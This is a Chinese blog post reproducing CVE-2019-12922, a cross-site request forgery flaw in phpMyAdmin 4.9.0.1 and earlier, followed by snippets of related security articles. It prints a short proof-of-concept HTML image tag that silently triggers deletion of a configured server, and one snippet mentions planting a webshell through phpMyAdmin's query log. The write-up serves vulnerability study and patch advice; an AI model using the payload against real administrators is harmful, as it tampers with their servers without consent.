phpMyAdmin跨站点请求伪造漏洞

最新推荐文章于 2024-09-12 19:20:20 发布
最新推荐文章于 2024-09-12 19:20:20 发布
阅读量604 收藏 1
点赞数
分类专栏: WEB安全 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/102260592
版权
安全研究员Manuel Garcia Cardenas近期公开了phpMyAdmin中的CVE-2019-12922漏洞详情及PoC,此漏洞允许攻击者诱使已认证用户删除服务器配置,虽不影响数据库或表,但威胁重大。本文详细介绍了漏洞原理、复现步骤及修复建议。
摘要由CSDN通过智能技术生成

CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站请求伪造漏洞复现

0X01 漏洞概述

安全研究人员Manuel Garcia Cardenas近日公布了最常用的管理MySQL和MariaDB数据库的应用程序phpMyAdmin中的0 day漏洞细节和PoC。

phpMyAdmin是一个用PHP编写的免费软件工具,也是用于处理MySQL或MariaDB数据库服务器的开源管理工具。phpMyAdmin被广泛用于管理用WordPress, Joomla等内容管理平台的网站的数据库。

安全研究人员称该漏洞实际上是一个CSRF漏洞,也叫做XSRF漏洞。即攻击者可以诱使认证的用户来执行恶意行为。

该漏洞CVE编号为CVE-2019-12922,攻击者利用该漏洞来删除受害者服务器上的phpMyAdmin面板上的设置页面中配置的任意服务器。但该攻击并不允许攻击者删除服务器上保存的数据库或表。

而攻击者只需要发送一个伪造的URL到目标web管理员,要求web管理员已经用相同的浏览器登入phpmyAdmin面板,这样就可以诱使用户通过点击来删除配置的服务器。Cardenas解释说,攻击者在伪造的URL中含有想要由用户执行的请求,这样由于错误使用HTTP方法使用CSRF攻击成为可能。

该漏洞利用起来非常容易,因为攻击者只需要知道目标服务器的URL就可以了,并不需要了解其他任何信息,包括数据库的name。

  • 受影响的版本

phpMyAdmin <= 4.9.0.1

0X02 环境搭建

在phpMyAdmin官网上找到历史版本下载链接

https://www.phpmyadmin.net/files/

在这里插入图片描述

0X03 漏洞复现

在登录状态下,添加一个服务器

http://127.0.0.1/phpmyadmin/setup/index.php
在这里插入图片描述

已经有test01服务器,创建test02服务器
在这里插入图片描述

  • POC
<p>Deleting Server 1</p>
<img src=”
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1″
style=”display:none;” />

抓包可以发现参数id对应的是第几个服务器 ,我们删除第一个服务器,poc构造如下。在这里插入图片描述

点击我们构造的恶意链接时,成功删除test01服务器
在这里插入图片描述

0X04 漏洞修复

  • 升级到最新版,不要轻易点击不可信网页链接

0X05 参考链接

tdcoming
关注
专栏目录
Web安全—服务器跨站请求伪造(SSRF)持续更新
weixin_44431280的博客
02-05 559
SSRF服务器请求伪造(Server-side Request Forgery) 提要:SSRF服务器请求伪造属于服务端漏洞(Server-side Request Forgery),通过被利用在从外网无法访问内部系统的常见(可将存在SSRF的主机作为跳板机利用其他内网的主机) 漏洞产生原因:目标服务器存在向其他应用服务器获取数据的功能且没有对目标地址做过滤与限制 SSRF漏洞总览图: SSRF漏洞原理图详解: 原理:网络环境中,通常内网和互联网都是隔离的,互联网的用户是无法直接访问到内网中的服务器的,
web漏洞检测项
千寻的博客
05-22 728
文章目录常规web漏洞检查列表注入漏洞XSS安全配置错误登录认证缺陷敏感信息泄露权限控制不严格跨站请求伪造 (CSRF)使用了存在漏洞的组件其他类型漏洞其他漏洞已公开高危漏洞业务逻辑漏洞检测列表登录注册密码找回购买支付充值抽奖/活动代金卷/优惠卷订单账户用户信息后台管理业务查询业务查询传输过程评论第三方商家 常规web漏洞检查列表 注入漏洞 HTML注入-反射性(GET)(POST)(Current URL) HTML注入-存储型 iFrame注入 LDAP注入(Search) 邮件Header注入 PH
phpmyadmin漏洞_CVE201912922 phpMyAdmin 4.9.0.1跨站请求伪造漏洞复现
weixin_39626369的博客
12-06 593
0X1漏洞概述phpMyAdmin 是一个 MySQL 和 MariaDB 数据库的免费开源管理工具,广泛用于管理 WordPress、Joomla 和许多其他内容管理平台创建的网站的数据库。前不久,有安全研究人员在phpMyAdmin中检测到跨站请求伪造,允许攻击者针对删除设置页面中任何服务器的phpMyAdmin用户触发CSRF攻击。受影响的版本phpMyAdmin <= 4...
跨站请求伪造解决方案
我这个代码你能看懂吗?
07-16 1055
防止CSRF攻击的方法有很多,最常见和有效的方法是使用CSRF令牌。其他方法如验证HTTP Referer头、使用SameSite Cookie属性和双重提交Cookie也可以作为辅助措施。根据具体的应用场景和需求,可以选择一种或多种方法来保护你的应用免受CSRF攻击。
phpmyadmin漏洞复现
最新发布
weixin_66022252的博客
09-12 255
是一条SQL语句,用于在MySQL数据库中启用全局查询日志(General Query Log)。这个日志记录了MySQL服务器接收到的每一个客户端请求,包括连接和断开连接的请求、SQL语句的执行等。这对于监控数据库活动、审计或调试是非常有用的。改变日志存储位置(mm.php为事先做好的一句话木马)从小皮登入靶场后输入账号密码进入靶场。访问php文件,并使用蚁剑进行连接。查看日志,发现一句话木马。连接成功~~~~~~~~点击sql框进行注入。
web基础漏洞之CSRF(跨站请求伪造漏洞)
m0_62274649的博客
10-04 1330
一些自己的小总结,有待完善
跨站请求伪造(CSRF)漏洞
qq_47848569的博客
05-31 580
CSRF的本质就是在不知情的情况下执行请求利用cookie在浏览器不过期的操作,使攻击者构造恶意的payload来修改用户的信息等pikachu靶场。
渗透之路基础 -- 跨站伪造请求CSRF
09-17 163
漏洞产生原因及原理 跨站请求伪造是指攻击者可以在第三方站点制造HTTP请求并以用户在目标站点的登录态发送到目标站点,而目标站点未校验请求来源使第三方成功伪造请求。 XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。 与XSS区别 ​ XSS是可以获取到用户的cookie,不需要伪造,是用户直接触发,它可以完成网站上脚本的任意功能 ​ CSRF不知道co...
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
热门推荐
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
Ajax与跨站请求伪造漏洞
03-22
Ajax与跨站请求伪造漏洞,近日,我们的网站请微软的工程师作了一次漏洞扫描,扫描结果中有两个“跨站请求伪造漏洞”。通过查资料,我做了一番研究,包括此漏洞的入侵条件,被攻击后的损失以及防范措施等。
浅谈一下CSRF(跨站请求伪造)和SSRF(服务器端请求伪造漏洞形成原因,二者区别,pikachu csrf、ssrf复现
qq_47289634的博客
07-03 937
CSRF是一种攻击技术,利用受害者在登录状态下的身份验证信息,通过伪造请求来执行未经授权的操作。攻击者诱使受害者访问恶意网站或点击恶意链接,从而触发受害者在目标网站上执行攻击者指定的操作,如修改密码、发起资金转账等SSRF是一种安全漏洞,攻击者通过在目标服务器上发起伪造请求,使服务器发起对内部资源的请求。攻击者可以利用这个漏洞访问目标服务器内部的资源,如访问内部接口、读取文件等。SSRF通常发生在目标服务器信任用户输入,并且未对输入进行充分验证和过滤的情况下。
CSRF-跨站请求伪造的原理与修复方式
bingtanggululu的博客
03-31 411
CSRF-跨站请求伪造的原理与修复方式
07_CSRF跨站请求伪造
qq_45301512的博客
12-10 159
强迫用户的浏览器在未经用户允许的前提下向存在csrf漏洞的服务器发送一条请求
CSRF(跨站请求伪造)和SSRF(服务端请求伪造漏洞复现:风险与防护方法
weixin_43263566的博客
08-30 863
CSRF漏洞指的是攻击者利用受害者的身份,在其不知情的情况下发送恶意请求给目标网站。由于目标网站无法区分恶意请求和正常请求,因此会执行该请求。这使得攻击者能够以受害者的名义执行一些不被授权的操作,例如更改密码、发表言论、转账等。不过我这里是测试就直接在浏览器打开脚本复现成功,其他类型的攻击方式操作也是这样。SSRF漏洞指的是攻击者通过操纵目标Web应用程序中的请求来发起伪造请求。攻击者利用这种漏洞可以访问应用程序所在服务器上的本地资源,或者攻击内部网络中的其他系统,并执行恶意操作。
php如何跨站post,如何使用PHP正确添加跨站请求伪造(CSRF)令牌
weixin_29332623的博客
03-10 276
小编典典对于安全代码,请不要以这种方式生成令牌: $token = md5(uniqid(rand(), TRUE));rand() 是可以预见的uniqid() 最多只加29位熵md5() 不添加熵,而是确定性地将其混合试试看:生成CSRF令牌PHP 7session_start();if (empty($_SESSION['token'])) {$_SESSION['token'] = bin...
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9722
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
总结分析 | 基于phpmyadmin的渗透测试
小司机的奥拓
09-22 3272
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpmyadmin漏洞
07-27
引用\[1\]:根据网上公开的phpMyadmin文件包含漏洞,通过代码审计定位危险函数,然后逐步分析,最终确定payload,并通过本地搭建phpMyadminV4.8.1版本成功进行漏洞复现。实际上该漏洞对于大部分版本的phpMyadmin都...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值